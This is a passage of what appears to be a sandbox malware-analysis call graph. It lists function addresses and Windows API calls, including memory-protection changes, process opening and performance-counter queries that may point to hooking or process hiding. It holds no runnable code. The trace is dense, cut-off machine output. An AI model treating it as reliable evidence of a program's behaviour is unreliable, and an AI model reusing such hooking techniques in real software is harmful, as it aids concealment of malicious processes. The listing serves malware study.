calls 8938->8942 8940 22f4b92dd0c FindClose 8939->8940 8945 22f4b930b20 38 API calls 8939->8945 8940->8918 8946 22f4b92dd1c 8940->8946 8941->8918 8943 22f4b92dd48 8941->8943 8942->8941 8947 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8943->8947 8944->8936 8945->8940 8948 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8946->8948 8947->8918 8948->8918 8952 22f4b930ed5 8949->8952 8950 22f4b930eda 8951 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8950->8951 8955 22f4b930ef0 8950->8955 8957 22f4b930ee4 8951->8957 8952->8950 8954 22f4b930f24 8952->8954 8952->8955 8953 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8953->8955 8954->8955 8956 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8954->8956 8955->8838 8956->8957 8957->8953 8959 22f4b92ef02 8958->8959 8960 22f4b92ef1f 8958->8960 8959->8960 8961 22f4b92ef10 8959->8961 8962 22f4b92ef29 8960->8962 9028 22f4b9319f0 8960->9028 8963 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8961->8963 9035 22f4b931a40 8962->9035 8966 22f4b92ef15 8963->8966 8966->8872 8968 22f4b9313e0 8967->8968 8969 22f4b9313f5 8968->8969 8971 22f4b93140e 8968->8971 8970 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8969->8970 8972 22f4b9313fa 8970->8972 8974 22f4b92dd78 14 API calls 8971->8974 8975 22f4b931405 8971->8975 8973 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8972->8973 8973->8975 8974->8975 8975->8873 8977 22f4b92d336 8976->8977 8978 22f4b92d35a 8976->8978 8981 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8977->8981 8983 22f4b92d345 FindFirstFileExW 8977->8983 8979 22f4b92d3bf 8978->8979 8980 22f4b92d35f 8978->8980 8982 22f4b92ec58 MultiByteToWideChar 8979->8982 8980->8983 8985 22f4b92d374 8980->8985 8987 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8980->8987 8981->8983 8984 22f4b92d3db 8982->8984 8983->8890 8983->8899 8986 22f4b92d3e2 GetLastError 8984->8986 8992 22f4b92d413 8984->8992 8996 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8984->8996 8997 22f4b92d420 8984->8997 8988 22f4b92c5d0 14 API calls 8985->8988 8989 22f4b92d184 13 API calls 8986->8989 8987->8985 8988->8983 8991 22f4b92d3ef 8989->8991 8990 22f4b92ec58 MultiByteToWideChar 8994 22f4b92d47a 8990->8994 8995 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8991->8995 8993 22f4b92c5d0 14 API calls 8992->8993 8993->8997 8994->8983 8994->8986 8995->8983 8996->8992 8997->8983 8997->8990 8999 22f4b92d4d6 8998->8999 9000 22f4b92d4fa 8998->9000 9003 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8999->9003 9007 22f4b92d4e5 8999->9007 9001 22f4b92d500 9000->9001 9002 22f4b92d55f 9000->9002 9005 22f4b92d515 9001->9005 9001->9007 9008 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9001->9008 9004 22f4b92ece8 WideCharToMultiByte 9002->9004 9003->9007 9014 22f4b92d583 9004->9014 9009 22f4b92c5d0 14 API calls 9005->9009 9006 22f4b92d58a GetLastError 9010 22f4b92d184 13 API calls 9006->9010 9007->8899 9008->9005 9009->9007 9013 22f4b92d597 9010->9013 9011 22f4b92d5c7 9011->9007 9012 22f4b92ece8 WideCharToMultiByte 9011->9012 9017 22f4b92d629 9012->9017 9018 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9013->9018 9014->9006 9014->9011 9015 22f4b92d5bb 9014->9015 9019 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9014->9019 9016 22f4b92c5d0 14 API calls 9015->9016 9016->9011 9017->9006 9017->9007 9018->9007 9019->9015 9021 22f4b930b52 9020->9021 9022 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9021->9022 9027 22f4b930b67 9021->9027 9023 22f4b930b5c 9022->9023 9024 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9023->9024 9024->9027 9025 22f4b928070 _invalid_parameter_noinfo 8 API calls 9026 22f4b930ea8 9025->9026 9026->8903 9027->9025 9029 22f4b931a12 HeapSize 9028->9029 9030 22f4b9319f9 9028->9030 9031 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9030->9031 9032 22f4b9319fe 9031->9032 9033 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9032->9033 9034 22f4b931a09 9033->9034 9034->8962 9036 22f4b931a5f 9035->9036 9037 22f4b931a55 9035->9037 9039 22f4b931a64 9036->9039 9045 22f4b931a6b Concurrency::details::SchedulerProxy::DeleteThis 9036->9045 9038 22f4b92c5d0 14 API calls 9037->9038 9043 22f4b931a5d 9038->9043 9040 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9039->9040 9040->9043 9041 22f4b931a71 9044 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9041->9044 9042 22f4b931a9e HeapReAlloc 9042->9043 9042->9045 9043->8966 9044->9043 9045->9041 9045->9042 9046 22f4b92b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9045->9046 9046->9045 8588 22f4b922ed8 8590 22f4b922f35 8588->8590 8589 22f4b922f50 8590->8589 8591 22f4b9238a8 3 API calls 8590->8591 8591->8589 9047 22f4b93485e 9048 22f4b929324 _CreateFrameInfo 9 API calls 9047->9048 9049 22f4b93486c 9048->9049 9050 22f4b934877 9049->9050 9051 22f4b929324 _CreateFrameInfo 9 API calls 9049->9051 9051->9050 8592 22f4b92f6dc 8593 22f4b92f6e8 8592->8593 8594 22f4b92f70f 8593->8594 8596 22f4b931c0c 8593->8596 8597 22f4b931c11 8596->8597 8598 22f4b931c4c 8596->8598 8599 22f4b931c32 DeleteCriticalSection 8597->8599 8600 22f4b931c44 8597->8600 8598->8593 8599->8599 8599->8600 8601 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8600->8601 8601->8598 7957 22f4b9225dc 7959 22f4b92265a 7957->7959 7958 22f4b922777 7959->7958 7960 22f4b9226bf GetFileType 7959->7960 7961 22f4b9226e1 7960->7961 7962 22f4b9226cd StrCpyW 7960->7962 7963 22f4b921ad4 4 API calls 7961->7963 7966 22f4b9226ee 7962->7966 7963->7966 7964 22f4b923f88 StrCmpNIW 7964->7966 7965 22f4b923708 4 API calls 7965->7966 7966->7958 7966->7964 7966->7965 7967 22f4b921dd4 2 API calls 7966->7967 7967->7966 8235 22f4b92c180 8238 22f4b92bf38 8235->8238 8245 22f4b92bf00 8238->8245 8246 22f4b92bf10 8245->8246 8247 22f4b92bf15 8245->8247 8248 22f4b92bebc 13 API calls 8246->8248 8249 22f4b92bf1c 8247->8249 8248->8247 8250 22f4b92bf31 8249->8250 8251 22f4b92bf2c 8249->8251 8253 22f4b92bebc 8250->8253 8252 22f4b92bebc 13 API calls 8251->8252 8252->8250 8254 22f4b92bec1 8253->8254 8255 22f4b92bef2 8253->8255 8256 22f4b92beea 8254->8256 8258 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8254->8258 8257 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8256->8257 8257->8255 8258->8254 8602 22f4b922300 8603 22f4b922331 8602->8603 8604 22f4b922447 8603->8604 8610 22f4b922355 8603->8610 8611 22f4b922412 8603->8611 8605 22f4b9224bb 8604->8605 8606 22f4b92244c 8604->8606 8608 22f4b9235c8 11 API calls 8605->8608 8605->8611 8619 22f4b9235c8 GetProcessHeap HeapAlloc 8606->8619 8608->8611 8609 22f4b92238d StrCmpNIW 8609->8610 8610->8609 8610->8611 8613 22f4b921d30 8610->8613 8614 22f4b921db4 8613->8614 8615 22f4b921d57 GetProcessHeap HeapAlloc 8613->8615 8614->8610 8615->8614 8616 22f4b921d92 8615->8616 8617 22f4b921cfc 2 API calls 8616->8617 8618 22f4b921d9a GetProcessHeap HeapFree 8617->8618 8618->8614 8624 22f4b92361b 8619->8624 8620 22f4b9236d9 GetProcessHeap HeapFree 8620->8611 8621 22f4b9236d4 8621->8620 8622 22f4b923666 StrCmpNIW 8622->8624 8623 22f4b921d30 6 API calls 8623->8624 8624->8620 8624->8621 8624->8622 8624->8623 8625 22f4b92b500 8630 22f4b92c558 EnterCriticalSection 8625->8630 9060 22f4b925c8d 9061 22f4b925c94 9060->9061 9062 22f4b925cfb 9061->9062 9063 22f4b925d77 VirtualProtect 9061->9063 9064 22f4b925db1 9063->9064 9065 22f4b925da3 GetLastError 9063->9065 9065->9064 7968 22f4b92820c 7975 22f4b928f34 7968->7975 7971 22f4b928219 7984 22f4b929340 7975->7984 7978 22f4b92c288 7979 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7978->7979 7980 22f4b928222 7979->7980 7980->7971 7981 22f4b928f48 7980->7981 8009 22f4b9292dc 7981->8009 7983 22f4b928f51 7983->7971 7985 22f4b92935f GetLastError 7984->7985 7986 22f4b928215 7984->7986 7996 22f4b929c8c 7985->7996 7986->7971 7986->7978 8000 22f4b929aac 7996->8000 8001 22f4b929b96 TlsGetValue 8000->8001 8006 22f4b929af0 __vcrt_FlsAlloc 8000->8006 8002 22f4b929b1e LoadLibraryExW 8004 22f4b929b3f GetLastError 8002->8004 8005 22f4b929bbd 8002->8005 8003 22f4b929bdd GetProcAddress 8003->8001 8004->8006 8005->8003 8007 22f4b929bd4 FreeLibrary 8005->8007 8006->8001 8006->8002 8006->8003 8008 22f4b929b61 LoadLibraryExW 8006->8008 8007->8003 8008->8005 8008->8006 8010 22f4b9292ed 8009->8010 8014 22f4b929302 8009->8014 8011 22f4b929c8c _CreateFrameInfo 6 API calls 8010->8011 8012 22f4b9292f2 8011->8012 8015 22f4b929cd4 8012->8015 8014->7983 8016 22f4b929aac __vcrt_FlsAlloc 5 API calls 8015->8016 8017 22f4b929d02 8016->8017 8018 22f4b929d14 TlsSetValue 8017->8018 8019 22f4b929d0c 8017->8019 8018->8019 8019->8014 8631 22f4b928f0c 8638 22f4b92946c 8631->8638 8634 22f4b928f19 8639 22f4b929474 8638->8639 8641 22f4b9294a5 8639->8641 8642 22f4b928f15 8639->8642 8655 22f4b929d28 8639->8655 8643 22f4b9294b4 __vcrt_uninitialize_locks DeleteCriticalSection 8641->8643 8642->8634 8644 22f4b929400 8642->8644 8643->8642 8660 22f4b929bfc 8644->8660 8656 22f4b929aac __vcrt_FlsAlloc 5 API calls 8655->8656 8657 22f4b929d5e 8656->8657 8658 22f4b929d73 InitializeCriticalSectionAndSpinCount 8657->8658 8659 22f4b929d68 8657->8659 8658->8659 8659->8639 8661 22f4b929aac __vcrt_FlsAlloc 5 API calls 8660->8661 8662 22f4b929c21 TlsAlloc 8661->8662 9066 22f4b928672 9067 22f4b9290c0 __std_exception_copy 38 API calls 9066->9067 9068 22f4b92869d 9067->9068 8259 22f4b92f370 VirtualProtect 9069 22f4b92f870 9070 22f4b92f8a0 9069->9070 9072 22f4b92f8c7 9069->9072 9071 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9070->9071 9070->9072 9076 22f4b92f8b4 9070->9076 9071->9076 9073 22f4b92f99c 9072->9073 9092 22f4b92c558 EnterCriticalSection 9072->9092 9075 22f4b92fa03 9073->9075 9077 22f4b92fab3 9073->9077 9078 22f4b92f9ca 9073->9078 9091 22f4b92fa61 9075->9091 9093 22f4b92c5ac LeaveCriticalSection 9075->9093 9076->9072 9079 22f4b92f949 9076->9079 9088 22f4b92f904 9076->9088 9080 22f4b92fac0 9077->9080 9094 22f4b92c5ac LeaveCriticalSection 9077->9094 9078->9075 9087 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 9078->9087 9081 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9079->9081 9084 22f4b92f94e 9081->9084 9086 22f4b92d04c _invalid_parameter_noinfo 38 API calls 9084->9086 9085 22f4b92cab0 14 API calls _invalid_parameter_noinfo 9085->9091 9086->9088 9089 22f4b92f9f3 9087->9089 9090 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 9089->9090 9090->9075 9091->9085 8020 22f4b922ff0 8021 22f4b923061 8020->8021 8022 22f4b923384 8021->8022 8023 22f4b92308d GetModuleHandleA 8021->8023 8024 22f4b9230b1 8023->8024 8025 22f4b92309f GetProcAddress 8023->8025 8024->8022 8026 22f4b9230d8 StrCmpNIW 8024->8026 8025->8024 8026->8022 8027 22f4b9230fd 8026->8027 8027->8022 8028 22f4b921a30 6 API calls 8027->8028 8029 22f4b9232b9 lstrlenW 8027->8029 8030 22f4b92320f lstrlenW 8027->8030 8031 22f4b921cfc StrCmpIW StrCmpW 8027->8031 8032 22f4b923f88 StrCmpNIW 8027->8032 8028->8027 8029->8027 8030->8027 8031->8027 8032->8027 8664 22f4b9346f5 8665 22f4b929324 _CreateFrameInfo 9 API calls 8664->8665 8666 22f4b93470d 8665->8666 8667 22f4b929324 _CreateFrameInfo 9 API calls 8666->8667 8668 22f4b934728 8667->8668 8669 22f4b929324 _CreateFrameInfo 9 API calls 8668->8669 8670 22f4b93473c 8669->8670 8671 22f4b929324 _CreateFrameInfo 9 API calls 8670->8671 8672 22f4b93477e 8671->8672 8260 22f4b925974 8261 22f4b92597a 8260->8261 8272 22f4b927fa0 8261->8272 8266 22f4b925a77 8268 22f4b925bfd 8266->8268 8270 22f4b9259de 8266->8270 8285 22f4b927b80 8266->8285 8267 22f4b925cfb 8268->8267 8269 22f4b925d77 VirtualProtect 8268->8269 8269->8270 8271 22f4b925da3 GetLastError 8269->8271 8271->8270 8274 22f4b927fab 8272->8274 8273 22f4b9259bd 8273->8270 8281 22f4b924400 8273->8281 8274->8273 8275 22f4b92b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8274->8275 8276 22f4b927fca 8274->8276 8275->8274 8277 22f4b927fd5 8276->8277 8291 22f4b9287b8 8276->8291 8295 22f4b9287d8 8277->8295 8282 22f4b92441d 8281->8282 8284 22f4b92448c 8282->8284 8304 22f4b924670 8282->8304 8284->8266 8286 22f4b927bc7 8285->8286 8329 22f4b927950 8286->8329 8289 22f4b928070 _invalid_parameter_noinfo 8 API calls 8290 22f4b927bf1 8289->8290 8290->8266 8292 22f4b9287c6 std::bad_alloc::bad_alloc 8291->8292 8299 22f4b929178 8292->8299 8294 22f4b9287d7 8296 22f4b9287e6 std::bad_alloc::bad_alloc 8295->8296 8297 22f4b929178 Concurrency::cancel_current_task 2 API calls 8296->8297 8298 22f4b927fdb 8297->8298 8300 22f4b929197 8299->8300 8301 22f4b9291e2 RaiseException 8300->8301 8302 22f4b9291c0 RtlPcToFileHeader 8300->8302 8301->8294 8303 22f4b9291d8 8302->8303 8303->8301 8305 22f4b924694 8304->8305 8306 22f4b9246b7 8304->8306 8305->8306 8318 22f4b924120 8305->8318 8309 22f4b9246ed 8306->8309 8324 22f4b924250 8306->8324 8312 22f4b924250 2 API calls 8309->8312 8315 22f4b92471d 8309->8315 8310 22f4b924753 8311 22f4b92476f 8310->8311 8313 22f4b924120 3 API calls 8310->8313 8314 22f4b92478b 8311->8314 8317 22f4b924250 2 API calls 8311->8317 8312->8315 8313->8311 8314->8284 8315->8310 8316 22f4b924120 3 API calls 8315->8316 8316->8310 8317->8314 8319 22f4b924141 8318->8319 8320 22f4b924196 VirtualQuery 8319->8320 8321 22f4b9241b0 8319->8321 8322 22f4b9241ca VirtualAlloc 8319->8322 8320->8319 8320->8321 8321->8306 8322->8321 8323 22f4b9241fb GetLastError 8322->8323 8323->8319 8327 22f4b924268 8324->8327 8325 22f4b9242d7 8325->8309 8326 22f4b9242bd VirtualQuery 8326->8325 8326->8327 8327->8325 8327->8326 8328 22f4b924322 GetLastError 8327->8328 8328->8327 8330 22f4b92796b 8329->8330 8331 22f4b927981 SetLastError 8330->8331 8332 22f4b92798f 8330->8332 8331->8332 8332->8289 8033 22f4b925ff9 8034 22f4b926000 VirtualProtect 8033->8034 8035 22f4b926029 GetLastError 8034->8035 8036 22f4b925f10 8034->8036 8035->8036 8037 22f4b9241f9 8038 22f4b924146 8037->8038 8039 22f4b924196 VirtualQuery 8038->8039 8040 22f4b9241b0 8038->8040 8041 22f4b9241ca VirtualAlloc 8038->8041 8039->8038 8039->8040 8041->8040 8042 22f4b9241fb GetLastError 8041->8042 8042->8038 8043 22f4b92cbfc 8048 22f4b92f3a0 8043->8048 8045 22f4b92cc05 8046 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8045->8046 8047 22f4b92cc22 __vcrt_uninitialize_ptd 8045->8047 8046->8047 8049 22f4b92f3b1 8048->8049 8050 22f4b92f3b5 8048->8050 8049->8045 8050->8049 8051 22f4b92ef88 9 API calls 8050->8051 8051->8049 9095 22f4b93387c 9096 22f4b9338b4 __GSHandlerCheckCommon 9095->9096 9097 22f4b9338e0 9096->9097 9099 22f4b929a24 9096->9099 9100 22f4b929324 _CreateFrameInfo 9 API calls 9099->9100 9101 22f4b929a4e 9100->9101 9102 22f4b929324 _CreateFrameInfo 9 API calls 9101->9102 9103 22f4b929a5b 9102->9103 9104 22f4b929324 _CreateFrameInfo 9 API calls 9103->9104 9105 22f4b929a64 9104->9105 9105->9097 8052 22f4b92f820 8055 22f4b92f7d8 8052->8055 8060 22f4b92c558 EnterCriticalSection 8055->8060 8061 22f4b92fe20 8062 22f4b92fe4a 8061->8062 8063 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8062->8063 8064 22f4b92fe6a 8063->8064 8065 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8064->8065 8066 22f4b92fe78 8065->8066 8067 22f4b92fea2 8066->8067 8068 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8066->8068 8069 22f4b92fec1 InitializeCriticalSectionEx 8067->8069 8072 22f4b92feab 8067->8072 8070 22f4b92fe94 8068->8070 8069->8067 8071 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8070->8071 8071->8067 8673 22f4b924320 8675 22f4b92426d 8673->8675 8674 22f4b9242bd VirtualQuery 8674->8675 8677 22f4b9242d7 8674->8677 8675->8674 8676 22f4b924322 GetLastError 8675->8676 8675->8677 8676->8675 8073 22f4b92c828 8074 22f4b92c842 8073->8074 8075 22f4b92c82d 8073->8075 8079 22f4b92c848 8075->8079 8080 22f4b92c892 8079->8080 8081 22f4b92c88a 8079->8081 8083 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8080->8083 8082 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8081->8082 8082->8080 8084 22f4b92c89f 8083->8084 8085 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8084->8085 8086 22f4b92c8ac 8085->8086 8087 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8086->8087 8088 22f4b92c8b9 8087->8088 8089 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8088->8089 8090 22f4b92c8c6 8089->8090 8091 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8090->8091 8092 22f4b92c8d3 8091->8092 8093 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8092->8093 8094 22f4b92c8e0 8093->8094 8095 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8094->8095 8096 22f4b92c8ed 8095->8096 8097 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8096->8097 8098 22f4b92c8fd 8097->8098 8099 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8098->8099 8100 22f4b92c90d 8099->8100 8105 22f4b92c6f8 8100->8105 8119 22f4b92c558 EnterCriticalSection 8105->8119 8333 22f4b930fa8 8334 22f4b930fcc 8333->8334 8335 22f4b928070 _invalid_parameter_noinfo 8 API calls 8334->8335 8336 22f4b93100e 8335->8336 8337 22f4b9233a8 8338 22f4b9233cf 8337->8338 8339 22f4b92349c 8338->8339 8340 22f4b9233ec PdhGetCounterInfoW 8338->8340 8340->8339 8341 22f4b92340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8340->8341 8342 22f4b923440 StrCmpW 8341->8342 8343 22f4b923488 GetProcessHeap HeapFree 8341->8343 8342->8343 8344 22f4b923455 8342->8344 8343->8339 8344->8343 8346 22f4b923950 StrCmpNW 8344->8346 8347 22f4b923982 StrStrW 8346->8347 8348 22f4b9239f2 8346->8348 8347->8348 8349 22f4b92399b StrToIntW 8347->8349 8348->8344 8349->8348 8350 22f4b9239c3 8349->8350 8350->8348 8356 22f4b921a30 OpenProcess 8350->8356 8353 22f4b923f88 StrCmpNIW 8354 22f4b9239e4 8353->8354 8354->8348 8362 22f4b921cfc 8354->8362 8357 22f4b921ab6 8356->8357 8358 22f4b921a64 K32GetModuleFileNameExW 8356->8358 8357->8348 8357->8353 8359 22f4b921aad CloseHandle 8358->8359 8360 22f4b921a7e PathFindFileNameW lstrlenW 8358->8360 8359->8357 8360->8359 8361 22f4b921a9c StrCpyW 8360->8361 8361->8359 8363 22f4b921d1c 8362->8363 8364 22f4b921d13 8362->8364 8363->8348 8365 22f4b921530 2 API calls 8364->8365 8365->8363 9129 22f4b92aaac 9130 22f4b92aad9 __except_validate_context_record 9129->9130 9131 22f4b929324 _CreateFrameInfo 9 API calls 9130->9131 9132 22f4b92aade 9131->9132 9134 22f4b92ab38 9132->9134 9136 22f4b92abc6 9132->9136 9143 22f4b92ab8c 9132->9143 9133 22f4b92ac34 9133->9143 9171 22f4b92a22c 9133->9171 9135 22f4b92abb3 9134->9135 9134->9143 9144 22f4b92ab5a __GetCurrentState 9134->9144 9158 22f4b9295d0 9135->9158 9140 22f4b92abe5 9136->9140 9165 22f4b9299cc 9136->9165 9140->9133 9140->9143 9168 22f4b9299e0 9140->9168 9141 22f4b92acdd 9144->9141 9146 22f4b92afb8 9144->9146 9147 22f4b9299cc Is_bad_exception_allowed 9 API calls 9146->9147 9148 22f4b92afe7 __GetCurrentState 9147->9148 9149 22f4b929324 _CreateFrameInfo 9 API calls 9148->9149 9156 22f4b92b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9149->9156 9150 22f4b92b0fb 9151 22f4b929324 _CreateFrameInfo 9 API calls 9150->9151 9152 22f4b92b100 9151->9152 9153 22f4b929324 _CreateFrameInfo 9 API calls 9152->9153 9154 22f4b92b10b __FrameHandler3::GetHandlerSearchState 9152->9154 9153->9154 9154->9143 9155 22f4b9299cc 9 API calls Is_bad_exception_allowed 9155->9156 9156->9150 9156->9154 9156->9155 9157 22f4b9299f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9156->9157 9157->9156 9228 22f4b929634 9158->9228 9160 22f4b9295ef __FrameHandler3::ExecutionInCatch 9232 22f4b929540 9160->9232 9163 22f4b92afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9164 22f4b929624 9163->9164 9164->9143 9166 22f4b929324 _CreateFrameInfo 9 API calls 9165->9166 9167 22f4b9299d5 9166->9167 9167->9140 9169 22f4b929324 _CreateFrameInfo 9 API calls 9168->9169 9170 22f4b9299e9 9169->9170 9170->9133 9236 22f4b92b144 9171->9236 9174 22f4b92a6f4 9175 22f4b92a645 9175->9174 9214 22f4b92a643 9175->9214 9289 22f4b92a6fc 9175->9289 9176 22f4b92a373 9176->9175 9220 22f4b92a3ab 9176->9220 9177 22f4b929324 _CreateFrameInfo 9 API calls 9179 22f4b92a687 9177->9179 9179->9174 9183 22f4b928070 _invalid_parameter_noinfo 8 API calls 9179->9183 9180 22f4b92a575 9184 22f4b92a592 9180->9184 9186 22f4b9299cc Is_bad_exception_allowed 9 API calls 9180->9186 9180->9214 9181 22f4b929324 _CreateFrameInfo 9 API calls 9182 22f4b92a2da 9181->9182 9182->9179 9187 22f4b929324 _CreateFrameInfo 9 API calls 9182->9187 9185 22f4b92a69a 9183->9185 9191 22f4b92a5b4 9184->9191 9184->9214 9282 22f4b9295a4 9184->9282 9185->9143 9186->9184 9188 22f4b92a2ea 9187->9188 9190 22f4b929324 _CreateFrameInfo 9 API calls 9188->9190 9194 22f4b92a2f3 9190->9194 9192 22f4b92a5ca 9191->9192 9193 22f4b92a6d7 9191->9193 9191->9214 9195 22f4b92a5d5 9192->9195 9198 22f4b9299cc Is_bad_exception_allowed 9 API calls 9192->9198 9196 22f4b929324 _CreateFrameInfo 9 API calls 9193->9196 9247 22f4b929a0c 9194->9247 9202 22f4b92b1dc 9 API calls 9195->9202 9199 22f4b92a6dd 9196->9199 9198->9195 9201 22f4b929324 _CreateFrameInfo 9 API calls 9199->9201 9204 22f4b92a6e6 9201->9204 9205 22f4b92a5eb 9202->9205 9203 22f4b9299e0 9 API calls 9203->9220 9207 22f4b92c2f4 14 API calls 9204->9207 9209 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9205->9209 9205->9214 9206 22f4b929324 _CreateFrameInfo 9 API calls 9208 22f4b92a335 9206->9208 9207->9174 9208->9176 9211 22f4b929324 _CreateFrameInfo 9 API calls 9208->9211 9210 22f4b92a605 9209->9210 9286 22f4b929838 RtlUnwindEx 9210->9286 9213 22f4b92a341 9211->9213 9215 22f4b929324 _CreateFrameInfo 9 API calls 9213->9215 9214->9177 9217 22f4b92a34a 9215->9217 9250 22f4b92b1dc 9217->9250 9220->9180 9220->9203 9261 22f4b92a96c 9220->9261 9275 22f4b92a158 9220->9275 9222 22f4b92a35e 9257 22f4b92b2cc 9222->9257 9224 22f4b92a6d1 9225 22f4b92c2f4 14 API calls 9224->9225 9225->9193 9226 22f4b92a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9226->9224 9227 22f4b929178 Concurrency::cancel_current_task 2 API calls 9226->9227 9227->9224 9231 22f4b929662 __FrameHandler3::ExecutionInCatch 9228->9231 9229 22f4b9296d4 9229->9160 9230 22f4b92968c RtlLookupFunctionEntry 9230->9231 9231->9229 9231->9230 9233 22f4b929560 9232->9233 9234 22f4b92958b 9232->9234 9233->9234 9235 22f4b929324 _CreateFrameInfo 9 API calls 9233->9235 9234->9163 9235->9233 9237 22f4b92b169 __FrameHandler3::ExecutionInCatch 9236->9237 9238 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9237->9238 9239 22f4b92b17e 9238->9239 9301 22f4b929db4 9239->9301 9242 22f4b92b190 __FrameHandler3::GetHandlerSearchState 9304 22f4b929dec 9242->9304 9243 22f4b92b1b3 9244 22f4b929db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9243->9244 9245 22f4b92a28e 9244->9245 9245->9174 9245->9176 9245->9181 9248 22f4b929324 _CreateFrameInfo 9 API calls 9247->9248 9249 22f4b929a1a 9248->9249 9249->9174 9249->9206 9252 22f4b92b2c3 9250->9252 9254 22f4b92b207 9250->9254 9251 22f4b92a35a 9251->9176 9251->9222 9253 22f4b9299e0 9 API calls 9253->9254 9254->9251 9254->9253 9255 22f4b9299cc Is_bad_exception_allowed 9 API calls 9254->9255 9256 22f4b92a96c 9 API calls 9254->9256 9255->9254 9256->9254 9258 22f4b92b339 9257->9258 9260 22f4b92b2e9 Is_bad_exception_allowed 9257->9260 9258->9226 9259 22f4b9299cc 9 API calls Is_bad_exception_allowed 9259->9260 9260->9258 9260->9259 9262 22f4b92a999 9261->9262 9271 22f4b92aa28 9261->9271 9263 22f4b9299cc Is_bad_exception_allowed 9 API calls 9262->9263 9264 22f4b92a9a2 9263->9264 9265 22f4b9299cc Is_bad_exception_allowed 9 API calls 9264->9265 9266 22f4b92a9bb 9264->9266 9264->9271 9265->9266 9267 22f4b92a9e7 9266->9267 9268 22f4b9299cc Is_bad_exception_allowed 9 API calls 9266->9268 9266->9271 9269 22f4b9299e0 9 API calls 9267->9269 9268->9267 9270 22f4b92a9fb 9269->9270 9270->9271 9272 22f4b92aa14 9270->9272 9273 22f4b9299cc Is_bad_exception_allowed 9 API calls 9270->9273 9271->9220 9274 22f4b9299e0 9 API calls 9272->9274 9273->9272 9274->9271 9276 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9275->9276 9277 22f4b92a195 9276->9277 9278 22f4b9299cc Is_bad_exception_allowed 9 API calls 9277->9278 9279 22f4b92a1cd 9278->9279 9280 22f4b929838 9 API calls 9279->9280 9281 22f4b92a211 9280->9281 9281->9220 9283 22f4b9295b8 __FrameHandler3::ExecutionInCatch 9282->9283 9284 22f4b929540 __FrameHandler3::ExecutionInCatch 9 API calls 9283->9284 9285 22f4b9295c2 9284->9285 9285->9191 9287 22f4b928070 _invalid_parameter_noinfo 8 API calls 9286->9287 9288 22f4b929932 9287->9288 9288->9214 9290 22f4b92a735 9289->9290 9291 22f4b92a948 9289->9291 9292 22f4b929324 _CreateFrameInfo 9 API calls 9290->9292 9291->9214 9293 22f4b92a73a 9292->9293 9294 22f4b92a759 EncodePointer 9293->9294 9299 22f4b92a7ac 9293->9299 9295 22f4b929324 _CreateFrameInfo 9 API calls 9294->9295 9296 22f4b92a769 9295->9296 9296->9299 9307 